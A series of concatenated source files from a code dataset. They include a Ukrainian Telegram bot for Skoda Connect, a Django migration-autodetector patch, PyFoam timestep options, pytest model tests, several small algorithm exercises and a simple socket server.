'Мене лише потрібно синхронізувати із твоїм обліковим записом Skoda Connect, а про все інше я подбаю! 💚\\n'\n '\\n'\n )\n await update.message.reply_text(\n rf'📧 Відправ мені свою електронну адресу, асоційовану з акаунтом у сервісі Skoda Connect'\n )\n\n return EMAIL\n\n\nasync def email(update, context) -> int:\n '''Get email from user to authorize in Skoda Connect service.'''\n chat_id = update.message.chat_id\n text = update.message.text\n\n if not validate_email(text):\n await context.bot.send_message(chat_id=chat_id, text='Напиши будь ласка коректну електронну адресу!')\n return EMAIL\n\n context.user_data['email'] = text\n await update.message.reply_text(f'🔑 Тепер відправ мені пароль')\n\n return PASSWD\n\n\nasync def passwd(update, context) -> int:\n '''Get password from user to authorize in Skoda Connect service'''\n text = update.message.text\n context.user_data['password'] = text\n await update.message.reply_text(f'🔄 Авторизуюсь у сервісі Skoda Connect...')\n user_data = context.user_data\n\n conn_service = SkodaConnectService(user_data.get('email'), user_data.get('password'))\n await conn_service.session_init()\n # connection instance\n connection = conn_service.get_connection_instance()\n\n if conn_service is not None:\n await update.message.reply_text(f'✅ Авторизація успішна! Отримую дані про твої авто... 
🚗 ')\n await conn_service.retrieve_vehicles()\n\n if len(conn_service.vehicles) < 1:\n await update.message.reply_text(f'Не знайшов жодної автівки у твоєму гаражі 🤷‍♂️')\n else:\n await update.message.reply_text(f'Знайшов {len(connection.vehicles)} авто в твоєму гаражі \\n')\n\n context.user_data['connection'] = connection\n else:\n await update.message.reply_text(f'Упс, щось пішло не так :( Авторизація не успішна, спробуй знову.')\n return ConversationHandler.END\n\n context.user_data['cars'] = [vehicle_info_normalization(x) for x in connection.vehicles]\n context.user_data['selected_car'] = None\n reply_markup = build_car_selection_keyboard(context.user_data['cars'])\n await update.message.reply_text('Authorization successful. Please select a car:', reply_markup=reply_markup)\n\n return CAR_SELECTION\n\n\nasync def garage(update, context):\n # Clear the selected car and show the car selection menu again\n context.user_data['selected_car'] = None\n reply_markup = build_car_selection_keyboard(context.user_data['cars'])\n await update.message.reply_text('Please select a car:', reply_markup=reply_markup)\n return CAR_SELECTION\n\n\nasync def car_selection(update, context):\n query = update.callback_query\n selected_car = query.data\n context.user_data['selected_car'] = selected_car\n reply_markup = build_action_selection_keyboard()\n await query.answer()\n await query.message.reply_text(f'Обрано команду {query.data}')\n await query.message.reply_text(text='Please select an action:', reply_markup=reply_markup)\n return ACTION_SELECTION\n\n\nasync def action_selection(update, context):\n query = update.callback_query\n selected_action = query.data\n # Do something with the selected car and action here\n await query.edit_message_text(text=f\"You selected {selected_action} for {context.user_data['selected_car']}.\")\n # Rebuild the action selection keyboard and send it to the user again\n reply_markup = build_action_selection_keyboard()\n await query.message.reply_text('Please select another action:', reply_markup=reply_markup)\n return ACTION_SELECTION\n\n\n\ndef build_car_selection_keyboard(cars):\n keyboard = [[telegram.InlineKeyboardButton(car, callback_data=car)] for car in cars]\n return telegram.InlineKeyboardMarkup(keyboard)\n\n\n# def build_action_selection_keyboard():\n#\n# keyboard = [[telegram.InlineKeyboardButton('Базова інформація', callback_data='base_info')],\n# [telegram.InlineKeyboardButton('Швидкий звіт по стану авто', callback_data='gen_quick_report')],\n# [telegram.InlineKeyboardButton('Дані про поїздки', callback_data='trip_report')],\n# [telegram.InlineKeyboardButton('Сервісні акції', callback_data='service_promo')],\n# [telegram.InlineKeyboardButton('Запис на сервісне обслуговування', callback_data='service_maintenance')],\n# [telegram.InlineKeyboardButton('Стан вікон/дверей', callback_data='win_door_state')],\n# [telegram.InlineKeyboardButton('Запас палива', callback_data='fuel_level')],\n# [telegram.InlineKeyboardButton('Локація авто', callback_data='location')],\n# [telegram.InlineKeyboardButton('Віддалені вказівки', callback_data='remote_commands')]]\n#\n# return telegram.InlineKeyboardMarkup(keyboard)\n\n\ndef build_action_selection_keyboard():\n\n keyboard = [['Базова інформація', 'Швидкий звіт по стану авто', 'Дані про поїздки', 'Сервісні акції',\n 'Запис на сервісне обслуговування', 'Стан вікон/дверей', 'Запас палива', 'Локація авто', 'Віддалені вказівки']]\n return telegram.ReplyKeyboardMarkup(keyboard, resize_keyboard=True)\n\n\ndef 
handle_action_selection(message):\n # Retrieve the selected option from the message\n selected_option = message.text\n\n # Perform an action based on the selected option\n if selected_option == 'Базова інформація':\n reply_text = 'Тут буде повна інформація про авто'\n elif selected_option == 'Швидкий звіт по стану авто':\n reply_text = 'Тут буде швидкий звіт про стан авто'\n elif selected_option == 'Дані про поїздки':\n reply_text = 'Тут будуть дані про поїздки'\n elif selected_option == 'Сервісні акції':\n reply_text = 'Тут будуть сервісні акції'\n elif selected_option == 'Запис на сервісне обслуговування':\n reply_text = 'Тут буде запис на сервісне обслуговування'\n elif selected_option == 'Стан вікон/дверей':\n reply_text = 'Тут буде стан вікон/дверей'\n elif selected_option == 'Запас палива':\n reply_text = 'Тут буде запас палива'\n elif selected_option == 'Локація авто':\n reply_text = 'Тут буде локація авто'\n elif selected_option == 'Віддалені вказівки':\n reply_text = 'Тут будуть віддалені вказівки'\n else:\n reply_text = 'Невідома опція'\n\n return reply_text\n\n\nasync def handle_message(update, context):\n message = update.message\n reply_text = handle_action_selection(message)\n await message.reply_text(reply_text)\n\n\ndef get_authorization_url():\n url = f'https://oauth3.example.com/authorize?client_id={CLIENT_ID}&redirect_uri={REDIRECT_URI}'\n return url\n\n\ndef get_access_token(authorization_code):\n url = 'https://oauth3.example.com/token'\n payload = {\n 'grant_type': 'authorization_code',\n 'code': authorization_code,\n 'client_id': CLIENT_ID,\n 'client_secret': CLIENT_SECRET,\n 'redirect_uri': REDIRECT_URI\n }\n response = requests.post(url, data=payload)\n if response.ok:\n return response.json()['access_token']\n else:\n return None\n\n\ndef main():\n # Create an instance of the Updater class\n application = Application.builder().token(TOKEN).build()\n\n # Add conversation handler for handling the /start command\n conv_handler = ConversationHandler(\n entry_points=[CommandHandler('start', start)],\n states={\n EMAIL: [MessageHandler(filters.TEXT & ~filters.COMMAND, email)],\n PASSWD: [MessageHandler(filters.TEXT & ~filters.COMMAND, passwd)],\n CAR_SELECTION: [CallbackQueryHandler(car_selection)],\n ACTION_SELECTION: [CallbackQueryHandler(action_selection)]\n },\n fallbacks=[CommandHandler('garage', garage)],\n allow_reentry=True\n )\n application.add_handler(conv_handler)\n application.add_handler(telegram.ext.MessageHandler(filters.TEXT, handle_message))\n\n # Add message handler for handling OAuth3 authorization - future development\n # message_handler = MessageHandler(filters.Regex(r'^https://oauth3.example.com/.*$'), oauth3_callback)\n # application.add_handler(message_handler)\n\n application.run_polling()\n application.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"obalenko/skodaconnect_bot","sub_path":"skodaconnect_bot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10588,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42667810722","text":"# Programmers\n# Stack, Queue\n# Feature Development\nimport math\ndef solution(progresses, speeds) :\n stack = []\n answer = []\n days = 0\n for i in range(len(progresses)) :\n days = math.ceil((100-progresses[i])/speeds[i])\n\n if i == 0 :\n stack.append(days)\n else : \n if stack[0] >= days :\n stack.append(days)\n else :\n answer.append(len(stack))\n stack.clear()\n stack.append(days)\n answer.append(len(stack))\n return 
answer\n","repo_name":"parkjeongmi/jamie_study","sub_path":"stack,queue/queue.03.py","file_name":"queue.03.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4216426178","text":"from contextlib import contextmanager\nfrom unittest import mock\n\nimport django\n\nfrom django.db.migrations import (\n AddField,\n AlterField,\n CreateModel,\n DeleteModel,\n RemoveField,\n RenameField,\n)\nfrom django.db.migrations.autodetector import MigrationAutodetector\nfrom django.db.migrations.operations.fields import FieldOperation\n\nfrom psqlextra.models import (\n PostgresMaterializedViewModel,\n PostgresPartitionedModel,\n PostgresViewModel,\n)\nfrom psqlextra.types import PostgresPartitioningMethod\n\nfrom . import operations\nfrom .state import (\n PostgresMaterializedViewModelState,\n PostgresPartitionedModelState,\n PostgresViewModelState,\n)\n\n# original `MigrationAutodetector.add_operation`\n# function, saved here so the patched version can\n# call the original\nadd_operation = MigrationAutodetector.add_operation\n\n\nclass AddOperationHandler:\n \"\"\"Handler for when operations are being added to a new migration.\n\n This is where we intercept operations such as\n :see:CreateModel to replace it with our own.\n \"\"\"\n\n def __init__(self, autodetector, app_label, args, kwargs):\n self.autodetector = autodetector\n self.app_label = app_label\n self.args = args\n self.kwargs = kwargs\n\n def add(self, operation):\n \"\"\"Adds the specified operation to the list of operations to execute in\n the migration.\"\"\"\n\n return add_operation(\n self.autodetector,\n self.app_label,\n operation,\n *self.args,\n **self.kwargs,\n )\n\n def add_field(self, operation: AddField):\n \"\"\"Adds the specified :see:AddField operation to the list of operations\n to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def remove_field(self, operation: RemoveField):\n \"\"\"Adds the specified :see:RemoveField operation to the list of\n operations to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def alter_field(self, operation: AlterField):\n \"\"\"Adds the specified :see:AlterField operation to the list of\n operations to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def rename_field(self, operation: RenameField):\n \"\"\"Adds the specified :see:RenameField operation to the list of\n operations to execute in the migration.\"\"\"\n\n return self._transform_view_field_operations(operation)\n\n def _transform_view_field_operations(self, operation: FieldOperation):\n \"\"\"Transforms operations on fields on a (materialized) view into state\n only operations.\n\n One cannot add/remove/delete fields on a (materialized) view,\n however, we do want Django's migration system to keep track of\n these kind of changes to the model. 
The :see:ApplyState\n operation just tells Django the operation was applied without\n actually applying it.\n \"\"\"\n\n if django.VERSION >= (4, 0):\n model_identifier = (self.app_label, operation.model_name.lower())\n model_state = (\n self.autodetector.to_state.models.get(model_identifier)\n or self.autodetector.from_state.models[model_identifier]\n )\n\n if isinstance(model_state, PostgresViewModelState):\n return self.add(\n operations.ApplyState(state_operation=operation)\n )\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.model_name\n )\n\n if issubclass(model, PostgresViewModel):\n return self.add(\n operations.ApplyState(state_operation=operation)\n )\n\n return self.add(operation)\n\n def add_create_model(self, operation: CreateModel):\n \"\"\"Adds the specified :see:CreateModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n\n if isinstance(model_state, PostgresPartitionedModelState):\n return self.add_create_partitioned_model(operation)\n elif isinstance(model_state, PostgresMaterializedViewModelState):\n return self.add_create_materialized_view_model(operation)\n elif isinstance(model_state, PostgresViewModelState):\n return self.add_create_view_model(operation)\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n\n if issubclass(model, PostgresPartitionedModel):\n return self.add_create_partitioned_model(operation)\n elif issubclass(model, PostgresMaterializedViewModel):\n return self.add_create_materialized_view_model(operation)\n elif issubclass(model, PostgresViewModel):\n return self.add_create_view_model(operation)\n\n return self.add(operation)\n\n def add_delete_model(self, operation: DeleteModel):\n \"\"\"Adds the specified :see:DeleteModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.from_state.models[\n self.app_label, operation.name.lower()\n ]\n\n if isinstance(model_state, PostgresPartitionedModelState):\n return self.add_delete_partitioned_model(operation)\n elif isinstance(model_state, PostgresMaterializedViewModelState):\n return self.add_delete_materialized_view_model(operation)\n elif isinstance(model_state, PostgresViewModelState):\n return self.add_delete_view_model(operation)\n else:\n model = self.autodetector.old_apps.get_model(\n self.app_label, operation.name\n )\n\n if issubclass(model, PostgresPartitionedModel):\n return self.add_delete_partitioned_model(operation)\n elif issubclass(model, PostgresMaterializedViewModel):\n return self.add_delete_materialized_view_model(operation)\n elif issubclass(model, PostgresViewModel):\n return self.add_delete_view_model(operation)\n\n return self.add(operation)\n\n def add_create_partitioned_model(self, operation: CreateModel):\n \"\"\"Adds a :see:PostgresCreatePartitionedModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n partitioning_options = model_state.partitioning_options\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n partitioning_options = model._partitioning_meta.original_attrs\n\n _, args, kwargs = operation.deconstruct()\n\n if partitioning_options[\"method\"] != 
PostgresPartitioningMethod.HASH:\n self.add(\n operations.PostgresAddDefaultPartition(\n model_name=operation.name, name=\"default\"\n )\n )\n\n partitioned_kwargs = {\n **kwargs,\n \"partitioning_options\": partitioning_options,\n }\n\n self.add(\n operations.PostgresCreatePartitionedModel(\n *args,\n **partitioned_kwargs,\n )\n )\n\n def add_delete_partitioned_model(self, operation: DeleteModel):\n \"\"\"Adds a :see:PostgresDeletePartitionedModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n _, args, kwargs = operation.deconstruct()\n return self.add(\n operations.PostgresDeletePartitionedModel(*args, **kwargs)\n )\n\n def add_create_view_model(self, operation: CreateModel):\n \"\"\"Adds a :see:PostgresCreateViewModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n view_options = model_state.view_options\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n view_options = model._view_meta.original_attrs\n\n _, args, kwargs = operation.deconstruct()\n\n view_kwargs = {**kwargs, \"view_options\": view_options}\n\n self.add(operations.PostgresCreateViewModel(*args, **view_kwargs))\n\n def add_delete_view_model(self, operation: DeleteModel):\n \"\"\"Adds a :see:PostgresDeleteViewModel operation to the list of\n operations to execute in the migration.\"\"\"\n\n _, args, kwargs = operation.deconstruct()\n return self.add(operations.PostgresDeleteViewModel(*args, **kwargs))\n\n def add_create_materialized_view_model(self, operation: CreateModel):\n \"\"\"Adds a :see:PostgresCreateMaterializedViewModel operation to the\n list of operations to execute in the migration.\"\"\"\n\n if django.VERSION >= (4, 0):\n model_state = self.autodetector.to_state.models[\n self.app_label, operation.name.lower()\n ]\n view_options = model_state.view_options\n else:\n model = self.autodetector.new_apps.get_model(\n self.app_label, operation.name\n )\n view_options = model._view_meta.original_attrs\n\n _, args, kwargs = operation.deconstruct()\n\n view_kwargs = {**kwargs, \"view_options\": view_options}\n\n self.add(\n operations.PostgresCreateMaterializedViewModel(\n *args,\n **view_kwargs,\n )\n )\n\n def add_delete_materialized_view_model(self, operation: DeleteModel):\n \"\"\"Adds a :see:PostgresDeleteMaterializedViewModel operation to the\n list of operations to execute in the migration.\"\"\"\n\n _, args, kwargs = operation.deconstruct()\n return self.add(\n operations.PostgresDeleteMaterializedViewModel(*args, **kwargs)\n )\n\n\n@contextmanager\ndef patched_autodetector():\n \"\"\"Patches the standard Django :see:MigrationAutodetector for the duration\n of the context.\n\n The patch intercepts the `add_operation` function to\n customize how new operations are added.\n\n We have to do this because there is no way in Django\n to extend the auto detector otherwise.\n \"\"\"\n\n autodetector_module_path = \"django.db.migrations.autodetector\"\n autodetector_class_path = (\n f\"{autodetector_module_path}.MigrationAutodetector\"\n )\n add_operation_path = f\"{autodetector_class_path}.add_operation\"\n\n def _patched(autodetector, app_label, operation, *args, **kwargs):\n handler = AddOperationHandler(autodetector, app_label, args, kwargs)\n\n if isinstance(operation, CreateModel):\n return handler.add_create_model(operation)\n\n if isinstance(operation, DeleteModel):\n return 
handler.add_delete_model(operation)\n\n if isinstance(operation, AddField):\n return handler.add_field(operation)\n\n if isinstance(operation, RemoveField):\n return handler.remove_field(operation)\n\n if isinstance(operation, AlterField):\n return handler.alter_field(operation)\n\n if isinstance(operation, RenameField):\n return handler.rename_field(operation)\n\n return handler.add(operation)\n\n with mock.patch(add_operation_path, new=_patched):\n yield\n","repo_name":"SectorLabs/django-postgres-extra","sub_path":"psqlextra/backend/migrations/patched_autodetector.py","file_name":"patched_autodetector.py","file_ext":"py","file_size_in_byte":11888,"program_lang":"python","lang":"en","doc_type":"code","stars":647,"dataset":"github-code","pt":"72"} +{"seq_id":"17457698312","text":"'''\nPopping and deleting from dictionaries\n\nOften, you will want to remove keys and values from a dictionary. You can do so using the del Python instruction. It's important to remember that del will throw a KeyError if the key you are trying to delete does not exist. You cannot use it with the .get() method to safely delete items; however, it can be used with try/except.\n\nIf you want to save that deleted data into another variable for further processing, the .pop() dictionary method will do just that. You can supply a default value for .pop() much like you did for .get() to safely deal with missing keys. It's also typical to use .pop() instead of del since it is a safe method.\n\nHere, you'll remove 2011 and 2015 to save them for later, and then delete 2012 from the dictionary.\n'''\n\nbaby_names = {}\n\nwith open('../datasets/baby_names.csv') as f:\n # Skipping header\n _ = f.readline()\n\n # Iterating over lines\n for row in f:\n year, sex, _, name, count, rank = row.strip().split(',')\n\n year = int(year)\n rank = int(rank)\n\n if sex == 'MALE' and year > 2011:\n # Empty dictionary for 2012\n if year in baby_names and year != 2012:\n baby_names[year][rank] = name\n else:\n baby_names[year] = {}\n\n# Sorting dictionary year by year\nfor y in baby_names:\n baby_names[y] = dict(sorted(baby_names[y].items()))\n\n'''\nINSTRUCTIONS\n\n* Iterate over baby_names[2014], unpacking it into rank and name.\n* Print each rank and name.\n* Repeat the process for baby_names[2012].\n'''\n\n# Iterate over the 2014 nested dictionary\nfor rank, name in baby_names[2014].items():\n # Print rank and name\n print(rank, name)\n \n# Iterate over the 2012 nested dictionary\nfor rank, name in baby_names[2012].items():\n # Print rank and name\n print(rank, name)\n ","repo_name":"sashakrasnov/datacamp","sub_path":"24-data-types-for-data-science/2-dictionaries--the-root-of-python/06-working-with-dictionaries-more-pythonically.py","file_name":"06-working-with-dictionaries-more-pythonically.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"4601139312","text":"import socket\nimport time\n\n# create a socket object\ns = socket.socket()\nprint (\"socket successfully created\")\n\n# specify a port\nport = 4888\n\n# bind to the port, \n# empty string is to allow listening from any computer\ns.bind(('', port))\nprint (\"socket bound to %s\" %(port))\n\n# put the socket into listening mode\ns.listen(5)\nprint (\"socket is listening\")\n\n# loop while listening for connections \nwhile True:\n\n\t# Establish connection with client.\n\tc, addr = s.accept()\n\tprint ('Got connection from', addr)\n\n\t# send a thank you message to the 
client.\n\t# need to use 'b' to send the message as bytes\n\tc.send(b'Thank you for connecting')\n\n\ttime.sleep(60)\n\n\t# Close the connection with the client\n\tc.close()","repo_name":"conyerbd/FIS_Exercises","sub_path":"NetSockMon/Python/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73285128553","text":"# ICE Revision: $Id$\n\"\"\"\nClass that implements common functionality for selecting timesteps\n\"\"\"\n\nfrom optparse import OptionGroup\n\nfrom PyFoam.ThirdParty.six import print_\n\nclass CommonSelectTimesteps(object):\n \"\"\"\n This class compiles a list of timesteps that should be processed\n \"\"\"\n def __init__(self):\n pass\n\n def addOptions(self,defaultUnique,singleTime=False):\n \"\"\"Add the necessary options\n :param defaultUnique: whether timesteps are unique by default\n :param singleTime: only a single timestep may be selected\"\"\"\n\n self.singleTime=singleTime\n\n time=OptionGroup(self.parser,\n \"Time Specification\",\n \"Which times should be processed\")\n time.add_option(\"--time\",\n type=\"float\",\n dest=\"time\",\n default=[],\n action=\"append\",\n help=\"Timestep that should be processed.\"+(\"\" if singleTime else \" Can be used more than once\"))\n time.add_option(\"--latest-time\",\n dest=\"latest\",\n action=\"store_true\",\n default=False,\n help=\"Use the latest time\")\n if not self.singleTime:\n time.add_option(\"--all-times\",\n dest=\"all\",\n action=\"store_true\",\n default=False,\n help=\"Process all times\")\n time.add_option(\"--after-time\",\n type=\"float\",\n dest=\"afterTime\",\n action=\"store\",\n default=None,\n help=\"Process all after this time\")\n time.add_option(\"--before-time\",\n type=\"float\",\n dest=\"beforeTime\",\n action=\"store\",\n default=None,\n help=\"Process all before this time\")\n\n if defaultUnique:\n time.add_option(\"--duplicate-times\",\n dest=\"unique\",\n action=\"store_false\",\n default=True,\n help=\"Allow using a time-directory more than once\")\n else:\n time.add_option(\"--unique-times\",\n dest=\"unique\",\n action=\"store_true\",\n default=False,\n help=\"Use each time-directory only once\")\n\n time.add_option(\"--show-times\",\n dest=\"showTimes\",\n action=\"store_true\",\n default=False,\n help=\"Show the times in the case and the times that will be used\")\n\n time.add_option(\"--parallel-times\",\n dest=\"parallelTimes\",\n action=\"store_true\",\n default=False,\n help=\"Use the information from 'processor0' to determine the available times\")\n\n self.parser.add_option_group(time)\n\n def processTimestepOptions(self,\n sol):\n \"\"\"Process the options\n :param sol: the solution-directory that is to be worked with\"\"\"\n\n if self.opts.parallelTimes:\n sol.setToParallel()\n\n if self.opts.latest:\n self.opts.time.append(float(sol.getLast()))\n if self.singleTime:\n if len(self.opts.time)>1:\n self.error(\"Only a single time allowed. 
We got\",len(self.opts.time),\" : \",\n \", \".join(self.opts.time))\n else:\n if self.opts.all:\n for t in sol.getTimes():\n self.opts.time.append(float(t))\n if self.opts.beforeTime or self.opts.afterTime:\n start=float(sol.getFirst())\n end=float(sol.getLast())\n if self.opts.beforeTime:\n end=self.opts.beforeTime\n if self.opts.afterTime:\n start=self.opts.afterTime\n for t in sol.getTimes():\n tVal=float(t)\n if tVal>=start and tVal<=end:\n self.opts.time.append(tVal)\n\n self.opts.time.sort()\n\n times=[]\n\n for s in self.opts.time:\n times.append(sol.timeName(s,minTime=True))\n\n if self.opts.unique:\n tmp=[]\n last=None\n cnt=0\n for s in times:\n if last!=s:\n tmp.append(s)\n else:\n cnt+=1\n last=s\n if cnt>0:\n self.warning(\"Removed\",cnt,\"duplicate times\")\n times=tmp\n\n if len(times)==0:\n self.warning(\"No valid times specified\")\n\n if self.opts.showTimes:\n print_(\"Times in case:\",sol.getTimes())\n print_(\"Used times:\",times)\n\n return times\n def processTimestepOptionsIndex(self,sol):\n \"\"\"Process the time options and return a list of (time,index) tuples\"\"\"\n times=self.processTimestepOptions(sol)\n\n return [(t,sol.timeIndex(t,True)) for t in times]\n\n# Should work with Python3 and Python2\n","repo_name":"nextfoam/baram","sub_path":"PyFoam/Applications/CommonSelectTimesteps.py","file_name":"CommonSelectTimesteps.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"38329064176","text":"import sys\nIS_TEST_DATA = False\nif IS_TEST_DATA == True:\n datas = '[2.2 1]'\nelse:\n datas = sys.stdin.readline()\nif datas is not None and len(datas) > 2:\n datas = datas[1:len(datas) - 1]\n nums = datas.split()\n for i in range(len(nums)):\n if '.' 
not in nums[i]:\n nums[i] = int(nums[i])\n else:\n nums[i] = float(nums[i])\n snums = list(sorted(list(set(nums))))\n for snum in snums:\n print(snum, end=' ')\n\n\n\n","repo_name":"Peefy/PythonsWithVSCode","sub_path":"src/nowcoder/nowcoder2.py","file_name":"nowcoder2.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"36246234748","text":"import pytest\nimport pandas as pd\nimport logging\nimport os\nimport mlflow\nimport numpy as np\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n@pytest.fixture(scope='session')\ndef model():\n\n gbc_model_local_path = os.path.join(\"src/train_gradient_boosting/models\", \"gradient_boosting_dir\")\n lb_model_local_path = os.path.join(\"src/train_gradient_boosting/models\", \"label_binarizer_dir\")\n\n return gbc_model_local_path, lb_model_local_path\n\ndef test_export_model(model):\n \"\"\"\n Checks if the model was exported\n \"\"\"\n gbc_model_local_path, lb_model_local_path = model\n assert gbc_model_local_path\n assert lb_model_local_path\n\n try:\n sk_pipe = mlflow.sklearn.load_model(gbc_model_local_path)\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n except mlflow.exceptions.MlflowException as err:\n logger.info(\"Could not find an sk_pipe configuration file at model path\")\n raise err\n\ndef test_label_binarizer(model):\n \"\"\"\n Test label binarizer\n \"\"\"\n _, lb_model_local_path = model\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n values = [\"<=50K\", \">50K\"]\n v = lb.transform(values)\n assert (v == [[0], [1]]).all()\n\ndef test_inference_less(model):\n \"\"\"\n Test inference \n \"\"\"\n\n gbc_model_local_path, lb_model_local_path = model\n logger.info(\"Loading model and performing inference\")\n logger.info(gbc_model_local_path)\n sk_pipe = mlflow.sklearn.load_model(gbc_model_local_path)\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n\n array = np.array([[\n 39,\n \"State-gov\",\n 77516,\n \"Bachelors\",\n 13,\n \"Never-married\",\n \"Adm-clerical\",\n \"Not-in-family\",\n \"White\",\n \"Male\",\n 0,\n 2174,\n 40,\n \"United-States\"]])\n\n df_temp = pd.DataFrame(data=array, columns=[\n \"age\",\n \"workclass\",\n \"fnlwgt\",\n \"education\",\n \"education-num\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"capital-gain\",\n \"capital-loss\",\n \"hours-per-week\",\n \"native-country\",\n ])\n\n pred = sk_pipe.predict(df_temp)\n y = lb.inverse_transform(pred)[0]\n\n assert y == \"<=50K\"\n\n\ndef test_inference_greater(model):\n \"\"\"\n Test inference \n \"\"\"\n\n gbc_model_local_path, lb_model_local_path = model\n logger.info(\"Loading model and performing inference\")\n logger.info(gbc_model_local_path)\n sk_pipe = mlflow.sklearn.load_model(gbc_model_local_path)\n lb = mlflow.sklearn.load_model(lb_model_local_path)\n\n array = np.array([[\n 31,\n \"Private\",\n 45781,\n \"Masters\",\n 14,\n \"Never-married\",\n \"Prof-specialty\",\n \"Not-in-family\",\n \"White\",\n \"Female\",\n 14084,\n 0,\n 50,\n \"United-States\"\n ]])\n\n df_temp = pd.DataFrame(data=array, columns=[\n \"age\",\n \"workclass\",\n \"fnlwgt\",\n \"education\",\n \"education-num\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"capital-gain\",\n \"capital-loss\",\n \"hours-per-week\",\n \"native-country\",\n ])\n\n pred = sk_pipe.predict(df_temp)\n y = lb.inverse_transform(pred)[0]\n\n assert 
y == \">50K\"","repo_name":"milon101/Deploying-a-Machine-Learning-Model-on-Heroku-with-FastAPI","sub_path":"src/model_check/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23252219335","text":"# -*- coding: utf-8 -*-\n\n################################################\n#\n# URL:\n# =====\n# https://leetcode.com/problems/unique-paths-ii/\n#\n# DESC:\n# =====\n# A robot is located at the top-left corner of a m x n grid (marked 'Start' in the diagram below).\n#\n# The robot can only move either down or right at any point in time.\n# The robot is trying to reach the bottom-right corner of the grid (marked 'Finish' in the diagram below).\n#\n# Now consider if some obstacles are added to the grids. How many unique paths would there be?\n#\n#\n#\n# An obstacle and empty space is marked as 1 and 0 respectively in the grid.\n#\n# Note: m and n will be at most 100.\n#\n# Example 1:\n# Input:\n# [\n# [0,0,0],\n# [0,1,0],\n# [0,0,0]\n# ]\n# Output: 2\n# Explanation:\n# There is one obstacle in the middle of the 3x3 grid above.\n# There are two ways to reach the bottom-right corner:\n# 1. Right -> Right -> Down -> Down\n# 2. Down -> Down -> Right -> Right\n#\n################################################\nfrom typing import List\n\n\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:\n m = len(obstacleGrid)\n if m == 0:\n return 0\n n = len(obstacleGrid[0])\n if n == 0:\n return 0\n\n obstacleGrid[0][0] = 1 - obstacleGrid[0][0]\n for i in range(1, m):\n obstacleGrid[i][0] = obstacleGrid[i - 1][0] * (1 - obstacleGrid[i][0]) # set it to 0 if the previous one is 0\n for i in range(1, n):\n obstacleGrid[0][i] = obstacleGrid[0][i - 1] * (1 - obstacleGrid[0][i])\n\n for i in range(1, m):\n for j in range(1, n):\n if obstacleGrid[i][j] == 1:\n obstacleGrid[i][j] = 0\n else:\n obstacleGrid[i][j] = obstacleGrid[i - 1][j] + obstacleGrid[i][j - 1]\n\n return obstacleGrid[-1][-1]\n","repo_name":"huajianmao/pyleet","sub_path":"solutions/a0063uniquepathsii.py","file_name":"a0063uniquepathsii.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"17965734590","text":"#!/usr/bin/python3\n\"\"\"defining paskal triangle function\"\"\"\n\n\ndef pascal_triangle(n):\n \"\"\"The function checks whether n is less than or equal to zero,\n and returns an empty list if it is.\"\"\"\n\n if n <= 0:\n return []\n\n triangle = [[1]]\n for i in range(1, n):\n row = [1]\n for j in range(1, i):\n prev_row = triangle[i - 1]\n row.append(prev_row[j - 1] + prev_row[j])\n row.append(1)\n triangle.append(row)\n\n return triangle\n","repo_name":"Abelmafi/alx-interview","sub_path":"0x00-pascal_triangle/0-pascal_triangle.py","file_name":"0-pascal_triangle.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5717499974","text":"#!/usr/bin/env python3\n\"\"\" create the results schema in the CDM DB \"\"\"\nimport logging\n\nfrom ..config import GlueConfig\nfrom ..db.multidb import MultiDB\nfrom ..db.utils import ensure_schema\nfrom ..webapi import WebAPIClient\n\nlogger = logging.getLogger(__name__)\n\n# 